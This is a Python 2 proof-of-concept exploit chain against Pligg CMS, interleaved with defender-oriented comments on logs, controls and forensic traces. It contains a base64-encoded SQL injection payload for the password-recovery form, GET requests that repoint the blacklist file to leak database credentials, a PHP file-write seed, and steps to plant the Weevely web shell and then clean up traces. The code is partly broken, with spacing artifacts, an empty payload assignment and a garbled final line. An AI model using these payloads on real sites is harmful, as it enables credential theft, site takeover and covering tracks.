import urllib, urllib2, base64, re
from time import sleep
from sys import argv
from cookielib import CookieJar
# Proof-of-concept chain against a Pligg CMS install, written for Python 2
# (`print` statement, urllib2, cookielib). Read top to bottom it shows four
# stages: (1) a SQL injection through the password-recovery form, (2) abuse of
# the admin configuration "save" endpoint to point the anti-spam blacklist
# file at a PHP source file, (3) appending PHP to that file through the
# blacklist editor, (4) using the appended PHP to write a second file.
# Each request below is annotated with what it does as far as the code shows,
# the log/artifact a defender would look for, and the server-side control
# that would have stopped that step.
# NOTE(review): as shown, the script is not valid Python 2 (spacing artifacts
# such as `< =` and `b "..."`, and an empty `weevely =` assignment whose
# payload is absent from this copy); treat it as documentation of the chain,
# not as runnable code.
print
# Requires the script name plus three positional args (exits on 3 or fewer).
if len (argv) < = 3 : exit()
# `port` is assigned but never referenced; every URL below hard-codes
# "http://" + target with no port component.
port = 80
target = argv[ 1 ]
path = argv[ 2 ]
uname = argv[ 3 ]
# A single cookie jar is shared by every request in the run, so whatever
# session cookie the recovery step establishes is presumably what authorizes
# the later admin/ requests — one client session touching recover.php and
# then admin/ pages within seconds is itself an anomaly worth alerting on.
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
# Password-recovery form body. The "id" field is base64 of a string that
# decodes to a SQL UNION SELECT reading user_login from pligg_users where
# user_level='admin', which implies the recovery handler decodes id and
# concatenates it into its query. Detection: recover.php POSTs whose base64
# id decodes to SQL keywords (UNION, SELECT, FROM). Control: bind id as a
# parameter / cast it to an integer before use; a recovery id should never be
# string-concatenated into SQL.
formdata = { "reg_password" : "random" ,
"reg_password2" : "random" ,
"n" : "123" ,
"processrecover" : "1" ,
"id" : base64.b64encode(b "mrcongiuntivo' UNION SELECT 1,(SELECT user_login FROM pligg_users WHERE user_level='admin' LIMIT 1),3,4,5,6,'sodoma@mailinator.com',8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 UNION SELECT 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 FROM pligg_users WHERE user_login = 'warum" )
}
data_encoded = urllib.urlencode(formdata)
print "[+] Sending the reset password request for user " + uname
# Stage 1: POST the crafted recovery form. `uname` is only used in the log
# line above; the account actually affected is chosen by the SQL payload.
response = opener. open ( "http://" + target + path + "recover.php" , data_encoded)
content = response.read()
print "[+] Heading to admin panel and activating anti-spam"
# Stage 2: admin settings are saved via plain GET with no visible CSRF token
# in the URL. var_id=12 is labelled by the script as the anti-spam switch.
# Control: state-changing admin actions should require POST plus a CSRF
# token; GET-based saves make this chain (and CSRF from any page) trivial.
response = opener. open ( "http://" + target + path + "admin/admin_config.php?action=save&var_id=12&var_value=true" )
content = response.read()
print "[+] Setting a new blacklist file"
# var_id=14 is the anti-spam blacklist *file path* (per the script's labels)
# and is repointed at libs/dbconnect.php — a PHP source file, not a log.
# The server evidently accepts any path here. Control: restrict this value
# to a fixed directory (logs/) and reject anything that is not a plain log
# filename. Detection: config audit entries where var_id 14 changes to a
# path ending in .php, or changes twice within a short window (see cleanup).
response = opener. open ( "http://" + target + path + "admin/admin_config.php?action=save&var_id=14&var_value=libs/dbconnect.php" )
content = response.read()
print "[+] Retrieving DB connection details"
# domain_management.php apparently renders the contents of the configured
# blacklist file; the regex pulls every define("NAME", 'value') pair, which
# with the file now pointed at dbconnect.php yields the database credentials
# (the script's own label says "DB connection details"). Control: the editor
# must only read from the restricted directory above. Response: if this
# request appears in logs after the var_id=14 change, rotate DB credentials.
response = opener. open ( "http://" + target + path + "admin/domain_management.php" )
content = response.read()
regex = re. compile ( "define\(\"([A-Z_]+?)\", '(.*?)'\)" )
print regex.findall(content)
print "[+] Preparing dbconnection.php for shell injection.."
# Stage 3a: the `remove=` parameter deletes a literal string from the
# blacklist file; here it is `?>` (URL-encoded as ?%3E), PHP's closing tag.
# Detection: a remove= value that is not a domain name. Forensics: nothing
# later in the script restores this tag, so a dbconnect.php with no closing
# tag (or with trailing non-PHP text) is a durable indicator.
response = opener. open ( "http://" + target + path + "admin/domain_management.php?id=0&list=blacklist&remove=?%3E" )
content = response.read()
print "[+] Time for some shell planting, preparing file_put_contents.."
# Stage 3b: `seed` is PHP source submitted as a blacklist "entry" via
# doblacklist=. It reads two GET parameters (WHR = destination path, WHT =
# content), appends WHT to WHR with FILE_APPEND, then chmods the path 0777 —
# an arbitrary-file-write primitive planted in a file the application
# includes. PHP function names are case-insensitive, so detections keyed on
# lowercase `file_put_contents`/`chmod` miss this upper-cased form; match
# case-insensitively and also on `$_GET`. Control: validate blacklist
# entries as hostnames before writing them to any file.
seed = "IF(ISSET($_GET[WHR])){FILE_PUT_CONTENTS(STRIPSLASHES($_GET[WHR]),STRIPSLASHES($_GET[WHT]), FILE_APPEND);}CHMOD($_GET[WHR],0777);"
response = opener. open ( "http://" + target + path + "admin/domain_management.php?id=&doblacklist=" + seed)
content = response.read()
print "[+] Injecting weevely.php [ https://github.com/epinna/Weevely/ ] with pwd: peekaboo"
# Stage 4: `weevely` would hold the web-shell source; it is absent in this
# copy (empty assignment). Each line is sent as WHT to admin_delete_comments.php
# with WHR=weevely.php; that endpoint has nothing to do with comments here —
# it is just any admin page that presumably includes dbconnect.php and thus
# runs the seeded PHP. sleep(4) paces the requests (~4 s per line).
# Detection: admin requests carrying WHR/WHT query parameters; a new .php
# file appearing in the application directory with mode 0777. Note the loop
# body below is unindented in this copy.
weevely =
for wl in weevely.splitlines():
formdata = { "WHR" : "weevely.php" ,
"WHT" : wl
}
data_encoded = urllib.urlencode(formdata)
response = opener. open ( "http://" + target + path + "admin/admin_delete_comments.php?" + data_encoded)
content = response.read()
sleep( 4 )
print "[+] Cleaning up the seeder.."
# Cleanup: the appended PHP is removed from the blacklist file and var_id=14
# is reset to the original log path. Not undone: the deleted `?>`, the written
# weevely.php, the changed admin password, and the config-change history —
# these remain as the evidence to look for.
response = opener. open ( "http://" + target + path + "admin/domain_management.php?id=0&list=blacklist&remove=" + seed)
content = response.read()
print "[+] Resetting the blacklist file.."
response = opener. open ( "http://" + target + path + "admin/admin_config.php?action=save&var_id=14&var_value=logs/domain-blacklist.log" )
content = response.read()
print
+ host + path +
|